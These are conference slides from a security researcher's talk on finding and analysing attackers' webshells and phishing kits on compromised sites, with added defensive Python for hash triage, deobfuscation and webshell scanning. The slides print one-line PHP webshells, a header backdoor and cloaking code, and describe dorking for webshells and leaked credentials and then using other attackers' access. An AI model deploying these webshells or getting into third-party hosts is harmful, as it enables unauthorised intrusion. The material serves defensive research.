HIP_2021_CannibalHacking

The document presents a talk by a security researcher discussing web security vulnerabilities, attacker techniques, and lessons learned from real-life examples. It emphasizes the importance of understanding how attackers operate, the tools they use, and the mistakes they make, while also providing insights into how to better secure web applications. The conclusion highlights the evolving landscape of web security and the need for continuous vigilance against various types of cyber threats.


Cannibal Hacking, from zero the hero to hammer smashed host

Hack In Paris 2021

19 November 2021

Synacktiv

0xMitsurugi
Table of contents

1 Introduction
2 Web (in)-security
3 Search all the things
4 Attacker arsenal
5 Real life example
6 Lessons learned
7 Conclusion


Presentation

Security researcher @Synacktiv
Vulnerability research & exploitation
Disclaimer: this research is done on personal time
0xMitsurugi

My company
https://www.synacktiv.com
Offensive security company, based in France
We're hiring!
reverse, pentest, DFIR, dev
interns!
just ask

3/71
Let's start!

IDA <3

4/71
About this talk

Warning
lack of asm, lack of 0-days
lack of legal base ¯\(°_o)/¯

Webshells, attackers, scans


HTTP is everywhere
Seen weird logs? weird files? webshells? This is it!

Time flies…
It's been a long long time
COVID, delays, and so on: parts of this document are more than 2 years old…
Oldies still goodies

6/71
2 Web (in)-security


The bad guys

How not to get caught when delivering malware


Don’t host it yourself
Use innocent victims
Hack them, and use those hosts !

Which malware ?
phishing
mirai/gafgyt/bots/malware
data hosting
defacing (less and less)
any other purpose

8/71
The bad guys

Yummy ! restaurant

9/71
The bad guys

Teach a man to phish…

10/71
The poor admins

Don’t blame the admins


Usually, no time to patch
Not always tech people
Security is hard (sad but true)
Password ‘password’ is a good idea, no ? … No ?

And time flies


Company disappears but website still up
Website forgotten (last blog update 2014)

11/71
But pirates are admin too !

Guess what
They are no better
weak passwords
same techniques reused again and again
Lots of artefacts left

And bad infras


they hack poorly configured hosts ?
they are poorly secured too !
directory listing enabled…
host multi-infected…

12/71
3 Search all the things


Search all the things

Goooooooooogle…

14/71
Dork like a boss
Just search..

Good google
Google is good ? evil ?
Google hides results
Be better than google

15/71
Dork like a boss

853 only ??

16/71
Dork like a boss

Better

17/71
Dork like a boss

Words are blacklisted


Don’t search for “password leaks” or “email hacked”

Better
gmail.com e10adc3949ba59abbe56e057f20f883e ext:txt

Why ?

$ echo -n 123456 | md5sum
e10adc3949ba59abbe56e057f20f883e
$
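Why the dork works: an unsalted MD5 of a common password is a fixed fingerprint, so the digest itself becomes the search term. The Python script below is an added example, not code from the talk; it applies the same idea defensively to triage a credential dump found on one of your own hosts, mapping MD5 and SHA-1 digests of a few common passwords back to plaintext. The short wordlist, the regexes and the sample dump (fictitious addresses) are all constructed here; a real check would load a full wordlist.

```python
import hashlib
import re

# Constructed: a tiny list of very common passwords; a real check would load a full wordlist.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "123456789", "12345678", "letmein"]

# Hex tokens of SHA-1 (40) or MD5 (32) length, and a loose e-mail matcher for context
HASH_RE = re.compile(r"\b[0-9a-f]{40}\b|\b[0-9a-f]{32}\b", re.I)
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def fingerprint_table(passwords=COMMON_PASSWORDS) -> dict[str, tuple[str, str]]:
    """Map unsalted MD5 and SHA-1 digests of common passwords back to (algorithm, password)."""
    table = {}
    for pw in passwords:
        for algo in ("md5", "sha1"):
            table[hashlib.new(algo, pw.encode()).hexdigest()] = (algo, pw)
    return table


def find_weak_hashes(text: str, table=None) -> list[dict]:
    """Find hash-looking tokens in a dump and report those that are digests of common passwords."""
    table = table if table is not None else fingerprint_table()
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for token in HASH_RE.findall(line):
            entry = table.get(token.lower())
            if entry is None:
                continue
            email = EMAIL_RE.search(line)
            hits.append({"line": lineno, "email": email.group(0) if email else None,
                         "algo": entry[0], "password": entry[1]})
    return hits


# Constructed dump in the email:hash shape such leaks usually have (addresses are fictitious).
SAMPLE_DUMP = """\
alice@gmail.com:e10adc3949ba59abbe56e057f20f883e
bob@example.org:5f4dcc3b5aa765d61d8327deb882cf99
carol@example.org:0123456789abcdef0123456789abcdef
"""

if __name__ == "__main__":
    for hit in find_weak_hashes(SAMPLE_DUMP):
        print(hit)
```

Only two of the three lines resolve: the third digest is not the hash of anything in the wordlist, which is exactly the negative result you want before deciding a line is a real leaked credential.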

18/71
Dork like a boss

Webshells
search for name of webshells
(yes it works..)
search for upload dirs
search for opendir
Use virustotal, urlscan and so on

Scrap google
use archive
go back in time when DNS are wiped :
curl --resolve infected.com:443:A.B.C.D https://infected.com

19/71
Dork like a boss

think like a bad guy


how would you name a webshell or command PHP file?
x.php ? cmd.php ? zz.php ?
easy targets ? upload dirs ?

think like a phisher


do you remove your phish kit ?
is the name paypal.zip ? bank.zip ? netflix.zip ?

20/71
Dork like a boss

Juicy search

21/71
Dork like a boss

Webshell

22/71
Dork like a boss

File Manager

23/71
Dork like a boss

perlbot, yikes !

24/71
Dork like a boss

Another webshell

25/71
Dork like a boss

And another webshell

26/71
Dork like a boss

And, yaaawn, another webshell

27/71
Dork like a boss

Wanna passwords ?

28/71
Dork like a boss

Bad google
Google is clever and knows those tricks
Prepare to get captcha-ed !

Bad searches
intitle:webshell
all of the so-called “best dork of 2020” you found

And honeypots
You won’t learn anything

29/71
Dork like a boss

Bim

30/71
Dork like a boss

Bim

31/71
Dork like a boss

Honeypot :(

32/71
Bounce like a boss

You get access !


Bad guys make mistakes, use them
Hosts are multi infected !
Reuse credzs

One more time for the merry-go round


Another webshell named “haxor webshell” ?
google intitle:haxor.webshell

Explore directories !
cheap hoster -> all hosts infected!
access.log -> find other webshells

33/71
Bounce like a boss

Starts with a phish

34/71
Bounce like a boss

Then a host

35/71
Bounce like a boss

Then a host

36/71
Bounce like a boss

With free webshell !!

37/71
Bounce like a boss

user@debian$ du -hs infected/
1.5G infected/
user@debian$

38/71
4 Attacker arsenal


Analyze all the files

From old to new


oldest files are perl bots (yes.. perl)
then C99
then webshells
file managers
minimalist webshells : uploader/unzipper
password protection…

PHP for the win


yes, php is over-represented
some ASP webshells, but it's negligible

40/71
Analyze all the files

Copy pasting
A lot of webshells
A gazillion of copies for each
Same with phish kits
Same with file managers
Passwords are usually bad
If you have one shot, try ‘cracking’

41/71
Making fun of mistakes

Yay ! Mistakes !

(...)
$PASS='4d1f35512954cb227b25bbd92e15bc7b'; //$PASS=cracking

(...)
$PASS=md5('cracking')

<label for="Password">Password:</label><H1>cracking</H1>
<input class="password" type="password" id="Password" name="Password" />

42/71
Making fun of mistakes

Yay ! Mistakes !

$PASS='4d1f35512954cb227b25bbd92e15bc7b';
$password = md5($_GET['pass']);
if (($password == $PASS) or (apache_request_headers()['L'] == 'L')) {
    print("Access granted");
} else {
    die();
}

Yes some hackers are bad…


uploads x.php, x.php.txt, x.jpg, x.gif, x.php7, x.php.html …

43/71
Making fun of mistakes

Yeah, bro put your mail here !

44/71
Backdooring the backdoor

Coding a webshell is hard, so..


Why not reuse this nice webshell found on a site with skulls and flames?

Pirates are not nice to each other


webshells are backdoored!
sometimes twice!
and someone's backdoor is backdoored (!?)

45/71
Backdooring the backdoor

<?php
(lot of php stuff)
eval(gzuncompress(base64_decode('a long string .... ')));
(again a lot of php stuff)
?>

46/71
Attacker defense

Bad guys are lame in security ? Not at all..


.htaccess
antibots
passwords
fake 404
header checks
bouncers..

And annoying stuff


eval gzipped eval gzipped etc…
scrambling
php obfuscation
not efficient against motivated ones, but..
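To see what a backdoored backdoor actually carries, an analyst has to peel the eval(gzuncompress(base64_decode(...))) layers without ever running them. The Python below is an added example, not code from the talk: it statically unwraps nested eval/decode layers (the decoder names and the regex shape are assumptions covering the usual PHP packers gzuncompress, gzinflate, gzdecode, base64_decode, str_rot13 and strrev), and builds its own two-layer sample around a benign constructed inner string so it runs offline.

```python
import base64
import codecs
import gzip
import re
import zlib

# Shape of one layer as seen in backdoored webshells: eval(<decoder>(<decoder>('literal'))).
# Group 1 captures the decoder chain (outermost first), group 2 the string literal.
_LAYER_RE = re.compile(
    r"""(?:eval|assert)\s*\(\s*
        ((?:(?:gzuncompress|gzinflate|gzdecode|base64_decode|str_rot13|strrev)\s*\(\s*)+)
        ['"]([A-Za-z0-9+/=\s]*)['"]\s*\)+\s*;?""",
    re.VERBOSE,
)


def _decode_step(func: str, data: bytes) -> bytes:
    """Apply one PHP decoding function statically; nothing is ever executed."""
    if func == "base64_decode":
        return base64.b64decode(re.sub(rb"\s", b"", data))
    if func == "gzuncompress":            # zlib container
        return zlib.decompress(data)
    if func == "gzinflate":               # raw DEFLATE, no header
        return zlib.decompress(data, -zlib.MAX_WBITS)
    if func == "gzdecode":                # gzip container
        return gzip.decompress(data)
    if func == "str_rot13":
        return codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
    if func == "strrev":
        return data[::-1]
    raise ValueError(f"unsupported decoder {func}")


def peel_layers(php_source: str, max_layers: int = 16) -> tuple[list[str], str]:
    """Unwrap nested eval(decode(...)) layers; returns (decoder chain per layer, innermost source)."""
    layers: list[str] = []
    current = php_source
    for _ in range(max_layers):
        m = _LAYER_RE.search(current)
        if not m:
            break
        chain = re.findall(r"[a-z0-9_]+", m.group(1))   # e.g. ['gzuncompress', 'base64_decode']
        data = m.group(2).encode()
        for func in reversed(chain):                     # PHP evaluates the innermost call first
            data = _decode_step(func, data)
        current = data.decode("utf-8", errors="replace")
        layers.append(" -> ".join(chain))
    return layers, current


# ---- constructed sample: a benign inner string wrapped twice, the way a packer would ----
def _wrap(inner: str, compressor: str) -> str:
    """Build one PHP eval layer using the given compressor (mirrors the attacker's packer)."""
    raw = inner.encode()
    if compressor == "gzuncompress":
        packed = zlib.compress(raw)
    elif compressor == "gzinflate":
        c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
        packed = c.compress(raw) + c.flush()
    else:                                                # gzdecode
        packed = gzip.compress(raw)
    return f"eval({compressor}(base64_decode('{base64.b64encode(packed).decode()}')));"


SAMPLE_INNER = 'echo "constructed benign payload";'
SAMPLE_FILE = (
    "<?php\n// ... lots of legitimate-looking code ...\n"
    + _wrap(_wrap(SAMPLE_INNER, "gzinflate"), "gzuncompress")
    + "\n// ... more legitimate-looking code ...\n?>"
)

if __name__ == "__main__":
    found, inner = peel_layers(SAMPLE_FILE)
    for i, chain in enumerate(found, 1):
        print(f"layer {i}: {chain}")
    print("innermost:", inner)
```

The point of the loop is the `max_layers` cap and the static decoding: a sample that needs sixteen rounds is itself a finding, and at no point does the decoded text get passed to an interpreter.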

47/71
Attacker defense

/*------------------ Anti Crawler ------------*/
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
    {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/

48/71
Attacker defense

Some anti-something

49/71
Attacker defense

Crude language

50/71
Attacker defense

Much ASCII ART

51/71
Attacker defense

htaccess
sometimes small, sometimes big, sometimes fun

A.B.C.D // leecher!
E.F.G.H // NSA or google
I.J.K.L // fuck you!

52/71
Attacker defense

more and more passwords…


the old days

<?php
system($_GET['cmd']);
?>

and now..

<?php
if (isset($_GET['aef'])) { system($_POST['vji']); }
?>

53/71
But how did they get in? Can we know?

No DFIR today..
Sometimes easy to guess
unauth upload dir
old vulnerable stuff
Sometimes impossible
ssh bruteforce?
other host?
other vector?

54/71
5 Real life example


Intermission 1

An innocent host with a view


Day 1, windows malware
Adding each day a malware for a week (low score on VT)
Day 10 phishing campaign (successful)
Day 11 phishing campaign (total failure)
Day 11 to 15 : tons of new directories, half installed phish kits
Day 15 everything wiped
Day 15 webserver deactivated

56/71
Curious cases of phishing failures

Teach a man to phish..


zip kits are forgotten on servers
… kits are poorly configured
… and sometimes multi-trojanized
… with results left on servers (???)
and sometimes with no results at all…

WHO earns money with that ?


users of phishing kits ?
sellers of phishing kits ?

57/71
Curious cases of phishing failures

Bro, I have all your victims

58/71
Curious cases of phishing failures

Brand new 2021 they said…

59/71
Curious cases of phishing failures

Prepare to get bored


intitle:index.of intext:paypal.zip
download, grep for fopen
results in real time if you’re quick enough
really disappointing

60/71
The boring case of Mirai/gafgyt and other bots

Mirai, gafgyt, and so on…


more boring than phish kits
always the same
follow the C&C for fun (?)
search for name, or client.c and server.c

61/71
Exceptionally

Once in a while
new malware variant
strong code

Example of unknown source (Troldesh maybe?)


Cheap technique
High impact

Still unclear
webshell well hidden
good passwords

62/71
Analyze all the files

Technique
A full wordpress theme uploaded
PHP code embedded in a wordpress variable (or base64 png)
Custom extraction routine
Password MD5 used as a seed to decrypt php
Still working on it

63/71
Analyze all the files

First part is unsuspicious, but

64/71
Analyze all the files

something bad happens here

65/71
6 Lessons learned


From Zero to Hero

Does warning admins work?


Sometimes I send mail
I can count on one hand the answers
But evil files tend to disappear :)

Who are those attackers?


cheap techniques
cheap attackers
as long as it works, they'll continue

67/71
Don’t get your host smashed

Patch, update, maintain


Terminate old servers,
Patch others,
Give strong passwords,
Audits,
yadda yadda…

$ grep -r 'exec(gzdecode' /var/www
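The grep above is one rule; a defender hunting on a webroot usually wants a handful of them in one pass. The Python scanner below is an added example, not code from the talk: its rules are assumptions drawn from the patterns shown in the slides (eval/exec of a decoded blob, system() fed from $_GET/$_POST, user-agent cloaking with a fake 404, a NOINDEX meta echoed from PHP, the apache_request_headers() master key), plus executable PHP under double extensions inside upload directories. It builds a constructed sample tree with placeholder blobs in a temporary directory and scans that, so it runs offline.

```python
import os
import re
import tempfile
from pathlib import Path

# Each rule is (indicator name, regex). Every pattern maps to a trait discussed in the talk:
# eval/exec of a decoded blob, shell commands fed from request parameters, user-agent cloaking
# with a fake 404, a NOINDEX meta echoed from PHP, and a request-header "master key" bypass.
RULES = [
    ("eval_of_decoded_blob",
     re.compile(r"\b(eval|exec|assert|create_function)\s*\(\s*"
                r"(gzuncompress|gzinflate|gzdecode|base64_decode|str_rot13)\s*\(", re.I)),
    ("shell_from_request",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
                r"\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("crawler_cloaking",
     re.compile(r"HTTP_USER_AGENT[\s\S]{0,300}?404 Not Found", re.I)),
    ("noindex_from_php",
     re.compile(r"echo\s*['\"]\s*<meta[^>]*NOINDEX", re.I)),
    ("header_backdoor",
     re.compile(r"apache_request_headers\s*\(\s*\)\s*\[[^\]]+\]\s*==", re.I)),
]

# Executable PHP hidden under an innocent or double extension, e.g. x.php.txt, x.php7, x.php.html
PHP_NAME = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
UPLOAD_DIRS = {"uploads", "upload", "files", "images", "tmp", "cache"}   # assumed names
MAX_BYTES = 2 * 1024 * 1024      # skip huge blobs; a webshell is small


def scan_source(text: str) -> list[str]:
    """Return the sorted indicator names that fire on one file's contents."""
    return sorted(name for name, rx in RULES if rx.search(text))


def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk a webroot and report every file with at least one indicator, keyed by relative path."""
    root_path = Path(root)
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root_path):
        for name in files:
            path = Path(dirpath) / name
            if path.stat().st_size > MAX_BYTES:
                continue
            hits = scan_source(path.read_text(encoding="utf-8", errors="ignore"))
            rel = path.relative_to(root_path)
            if PHP_NAME.search(name) and UPLOAD_DIRS.intersection(rel.parts[:-1]):
                hits.append("php_in_upload_dir")
            if hits:
                findings[rel.as_posix()] = sorted(hits)
    return findings


# ---- constructed sample tree (placeholder blob only; nothing here is a working payload) ----
SAMPLE_FILES = {
    "index.php": '<?php echo "hello"; ?>\n',
    "wp-content/uploads/x.php.txt":
        "<?php\n"
        "if(preg_match('/Google|Slurp|MSNBot/i', $_SERVER['HTTP_USER_AGENT']))"
        " { header('HTTP/1.0 404 Not Found'); exit; }\n"
        "eval(gzuncompress(base64_decode('PLACEHOLDER_BLOB')));\n",
    "themes/x.php": "<?php if (isset($_GET['aef'])) { system($_POST['vji']); } ?>\n",
}


def build_sample_tree(root: str) -> None:
    """Write the constructed files under root."""
    for rel, content in SAMPLE_FILES.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")


def demo() -> dict[str, list[str]]:
    """Create the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

For a real host, call `scan_tree("/var/www")` and review each hit by hand: these are triage indicators, and a plugin that legitimately hides itself from crawlers will show up next to the webshells.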

68/71
7 Conclusion


Is there a turning point ?

Personal thought
Landscape is evolving
Less and less “personal” webservers
More and more facebook pages, no more personal blog
Or less and less PHP ?
pirates are better at hiding ?
or more and more exposure
trackers etc..

70/71
Final words ?

bad guys are here


phisher, wannabee hacker, kiddies, bots…
lousy PHP scripts
they are not always lame, we just find the lamest

google is (bad|good)
Finding bad guys is harder

warning
I’m not a lawyer, but : don’t do this at home, it may be highly illegal
use tor (at the cost of high captcha rates)
use kali in live mode in VM in a burner laptop

71/71
DO YOU HAVE
ANY QUESTIONS ?

THANK YOU FOR YOUR ATTENTION
